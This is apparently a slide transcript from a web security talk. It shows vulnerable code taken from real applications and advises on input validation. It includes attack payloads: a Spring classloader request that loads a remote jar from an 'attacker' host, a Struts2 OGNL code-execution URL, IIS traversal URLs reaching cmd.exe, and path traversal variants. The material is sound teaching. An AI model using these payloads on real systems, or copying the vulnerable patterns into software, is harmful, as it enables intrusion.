Transcript Don`t Try This At Home
DON’T TRY TH IS AT HOME
Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really...
JAVA PHP ASP C# VB.Net
All Languages Can Lead To Security Vulnerabilities PERL PYTHON FLASH C, C++ CFML
Security Vulnerability
Abritrary Graph Of Statistics Of Vulnerabilities
3 rd Hit Is A Vulnerability In A Graph Application And Its SQL Injection Have I Mentioned 2010 Yet?
Abritrary Graph Of Statistics Of Vulnerabilities
http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Abritrary Graph Of Statistics Of Vulnerabilities
http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Abritrary Graph Of Statistics Of Vulnerabilities
Huh?
http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Apologies The code you are about to see comes from real applications, only the variable names have been changed to protect the guilty.
If this code resembles yours, you may want to take notes...
What's Wrong With This Picture if (!string.IsNullOrEmpty( Request.QueryString["Eid"])) CMSMain.WhereCondition =
Data Access Through Framework
"TitleID IN (SELECT TitleID FROM CMS_Documents WHERE EID = " + Request.QueryString["Eid"] + ")“;
Frameworks Don’t Always Protect You
Frameworks Segway....
Framework Bugs Spring Framework Spring Framework execution of arbitrary code http://blog.o0o.nu/2010/06/cve-2010-1622.html
Any Form Controller
POST /adduser HTTP/1.0
...
class.classLoader.URLs[0]= jar:http://attacker/spring-exploit.jar!/
Overwrite The WebappClassLoader URL With An Arbitrary Remote Jar
Framework Bugs Struts2/XWork Framework Struts2 Framework execution of arbitrary code http://blog.o0o.nu/2010/07/cve-2010-1870 struts2xwork-remote.html
http://mydomain/MyStruts.action?
('\u0023_memberAccess[\'allowStaticMethodAc cess\']')(meh)=true&(aaa) (('\u0023context[\'xwork.MethodAccessor.den
yMethodExecution\']\u003d\u0023foo')(\u0023 foo\u003dnew%20java.lang.Boolean("false"))) &(asdf) (('\u0023rt.exit(1)')
Execute Arbitrary Java Code
(\u0023rt\[email protected]@getRunti me()))=1
“Lets make a list...” OWASP Top 10
Trusting Filenames From The User Image Loader Called via pages to display images Passed an image name in the URL public void ProcessRequest(HttpContext context) { string ImageUrl = context.Request.QueryString["ImageUrl"]; ..
context.Response.WriteFile(ImageUrl); }
Retrieve Arbitrary File From Server
Trusting URLS From The User Help System Page Loader Called to load help contents from other server Passed a page reference in the URL public byte[] GetBytesFromUrl(string url) { HttpWebRequest myReq =
Make Internal Network Requests
WebRequest.Create(url); var webResponse = webRequest.GetResponse(); using (var responseStream = webResponse.GetResponseStream()) { return responseStream.ToBytes(); } }
Using 302 Redirect As Security Measure Making Unauthenticated Request Results in a 302 redirect to the login page HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226
That Seems Suspiciously Large
Object moved to here.
Using 302 Redirect As Security Measure HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226 Object moved to
Oh there it is.
href="/admin/login">here.
Things that work
Things that DO NOT work Posting the CAPTCHA answer and response Posting the CAPTCHA ‘id’ and response POST /captcha HTTP/1.0
answer=kbpsh&response=kbpsh....
Using HTML to display the CAPTCHA ‘word’ Using HTML to display a mathematical equation to solve Please type in these letters: kbpsh
Shopping Cart Troubles Usual Shopping Process
Shopping Cart Troubles My Shopping Process
Add To Cart Contents After Payment Processed
Flash Accepts User Input Image Loader Flash loaded by HTML page HTML page sets parameters
Can Be Set Via URL Parameters
private var imgPath:String; imgPath = "http://localhost/sample.jpg" : img = this.loaderInfo.parameters.img; img_holder = new Image(imgPath);
Flash Movie Host On Your Site, Loading Images From Attackers Site
Cross System Data Truncation Forgotten Password Feature Page accepts email address and checks it is valid strEmail = Request.Form("txtemail") If strEmail <> "" Then objQRY.ClearParameters
objQRY.AddParameter "@email", trim(strEmail)
Calls A Stored Procedure
set rsLogin = objQRY.ReturnRS("spUserMatch")
Cross System Data Truncation Forgotten Password Feature Stored procedures does a user lookup CREATE PROCEDURE [dbo].[spUserMatch] @email varchar(100) = null ...
Truncates Input To 100 Characters
Cross System Data Truncation Forgotten Password Feature If user exists, send email with new password Set Mailer = Server.CreateObject("SMTPsvg.Mailer") Mailer.Subject = "New Password" Mailer.BodyText = strBody Mailer.Recipient = strEmail
Attacker Receives Copy Of Email Uses The Original Input (Non Truncated)
Cookie Data Serialisation Object Serialised Base64 encoded and stored as cookie // create map java.util.HashMap map = new java.util.HashMap(); map.put("UserId", UserId); map.put("email", email); // Serialise and B64 it String info = java.net.URLEncoder.encode(new String(org.apache.commons.codec.binary.Base64.encode
Base64(buffer.toByteArray()),"UTF-8"),"UTF-8"); // Store it in cookie org.apache.cocoon.environment.http.HttpCookie cookie = new org.apache.cocoon.environment.http.HttpCookie("SESSI ON", info);
Cookie Data Serialisation Object Is Stored Insecurely In Cookie Base64 is not encryption Cookie Data Can Be Decoded And modified And recoded And sent back Application Deserialises It And trusts it And attacker gains access as another userID
Lets Not Leave Out PHP Execute System() With User Supplied Input This was for real.... In a ‘security’ appliance used by .mil
if ($_GET["cmd"] == "TERMEND") { $sid = $_GET["param"]; $cmd = "/var/www/htdocs/utt/Queue.pl
delete_message_queue $sid"; system($cmd);
Did I Mention That It Was Unauthenticated Access
Cookies Well, This Sure Looks Useful void CheckLoginCount() { HttpCookie cookie = Request.Cookies["LoginAttempts"]; } if (cookie != null) { int attempts = cookie.Value; if (attempts >= 5) Redirect("~/AccessDenied.aspx”); }
More Cookies Remember Me Functionality User selects remember me Application generates random token Stores token in cookie, and in database $token = substr(md5(uniqid(rand(), true)), 0, 49 - strlen($this->ID)); $this->RememberLoginToken = $token; Cookie::set('rem_me', $this->ID . ':' . $token);
More Cookies Remember Me Functionality User selects to logout Application sets token to null Stores null in cookie, and in database $this->RememberLoginToken = null; Cookie::set('rem_enc', null);
More Cookies Remember Me Functionality If the user doesn’t logout they use the autologin feature Application loads user based on cookie value Application checks the $tokens match list($uid, $token) = explode(':', Cookie::get(‘rem_me'), 2); $a_uid = Convert::raw2sql($uid); $user = DataObject:: get_one(“User", “User.ID = '$a_uid'"); if($user && $user->RememberLoginToken != $token) { $member = null; }
What Happens If $token is empty (null)
Evil Users Never Trust User Supplied Input
No really, users are evil And Hands Leap Out Of Matrix Style Backgrounds
Input Validation Input Validation Is The Key No I didn’t say ‘silver bullet’ Properly implemented can prevent most app vulns Validate At Input Validate all input to ensure if conforms to the required format Validate All Input Text strings, Cookie values, HTTP headers File data, Path names, URL values, Currency Data from databases, 3rd parties, web services
Client Site Validation Should only be used to reduce browser requests Never rely on client side validation for security Backend Validation Validate the data Ensure the user is authorised to access data records Should not matter what values the user sends
Data Normalisation Data Comes In Many Forms “this is data” %74%68%69%73%20%69%73%20%64%61%74%61 this is 0;data “ThIs iS dAtA” Many paths to the same location /help.jsp?page=user/welcome.htm
/help.jsp?page=user/../admin/welcome.htm
/help.jsp?page=user\..\admin/welcome.htm
/help.jsp?page=user\/\/..//\\/admin/welcome.htm
/help.jsp?page=help.jsp
Data Decoding or Normalisation Depending On Application Decode or reject Detect Encoded Data Decode the data and compare to original Decode Recursively To Its Lowest Form Concatenation of paths Multiple layers of encoding Formalise Decoding Order To prevent unintended decoding later in the application
Data Decoding And Validation FAIL MS Extended Unicode vulnerability /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir MS Double Decode vulnerability /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir NGINX Source Code Disclosure http://www.example.com/file.php%20
Conforms Ensure Data Conforms To Required Format Check length, type, min() max() values Alphanumeric only Must be a valid date Reject Bad Data Do not attempt to fix it up Easily leads to confusion Use Data Whitelists Checks against a list of known good values Easier to know which values are good input The recommended approach
Santise Data For Use Data Will Be Used In Different Place SQL, XML, Output, Log files Requires Different Sanitisation Remove meta chars Remove special characters Remove Linefeeds Use Standard Formalised Reusable Code Blocks Most languages contain these OWASP supplies some Homebrew stuff should be well tested and documented at the start of development
When Filtering Goes Wrong This Is Not Filtering If (imageurl = “/web.config”) exit() And Yes, XSS without